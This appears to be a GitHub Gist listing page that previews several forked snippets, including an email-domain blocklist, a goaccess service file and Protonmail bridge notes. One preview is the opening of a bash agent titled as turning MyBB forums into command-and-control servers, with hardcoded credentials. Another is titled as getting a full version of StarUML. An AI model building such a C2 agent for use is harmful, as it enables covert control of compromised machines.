Skip to content

Instantly share code, notes, and snippets.

@githubcom13
githubcom13 / Free_Disposable_ESP_Abuse_SPAM
Created October 30, 2024 18:23 — forked from drakodev/Free_Disposable_ESP_Abuse_SPAM
most comprehensive collection (183538) of free and disposable email provider domains, curated from multiple sources, including contributions from Okutbay and frankwarwick. This list has been further extended to include domains flagged as abusive, malware-associated, or considered risky by spam traps.
This file has been truncated, but you can view the full file.
# Email List Containing free and disposable email service providers.
# Some domains have been included as they have been trapped by SPAM, Anti-Malware Systems
# NOTE: Some domains may have stopped working
0-00.usa.cc
0-180.com
0-30-24.com
0-420.com
0-900.com
@githubcom13
githubcom13 / goaccess.service
Created June 16, 2020 14:07 — forked from virtualdreams/goaccess.service
goaccess systemd service
[Unit]
Description=Goaccess Web log report.
After=network.target
[Service]
Type=simple
User=root
Group=root
Restart=always
ExecStart=/usr/local/bin/goaccess -a -g -f /var/log/nginx/access.log -o /srv/www/goaccess/index.html --real-time-html --ws-url <your url>
@githubcom13
githubcom13 / agent.sh
Created June 8, 2020 19:16 — forked from tokyoneon/agent.sh
MyCC - turn MyBB forums into C&C servers
#!/bin/bash
# https://null-byte.com/turn-forums-into-c-c-servers-0196708/
while true; do
forumUser="tokyoneon";
username="[email protected]";
password="treHGFd76547^%$";
cookies='/tmp/forum_cookies';
function urlencode ()
@githubcom13
githubcom13 / starUML.md
Created June 2, 2020 14:58 — forked from trandaison/starUML.md
Get full version of StarUML
@githubcom13
githubcom13 / Protonmail.md
Last active March 28, 2025 10:44 — forked from ibaiul/Protonmail.md
Configure the protonmail bridge linux client on Ubuntu 20.04 and Debian 10 server

Protonmail on Ubuntu 20.04 and Debian 10 server

#protonmail #debian #linux

Before you start

Currently protonmail bridge for linux is distributed as part of an open beta program, but soon it will be made public (https://protonmail.com/bridge/install).

Consider that the bridge linux client requires a paid protonmail account to work.

Get the protonmail bridge linux installer

@githubcom13
githubcom13 / generate.php
Created April 19, 2016 21:27
PHP: CLI script that can also be run in a web browser
<?php
// I had a command line (CLI) script written in PHP that I wanted to be able to
// run via the web, to save having to open a terminal and SSH connection each
// time.
// First I had to modify the console script so it could output messages to
// either the console, using STDOUT or STDERR, or the web, which requires
// flushing the buffer each time: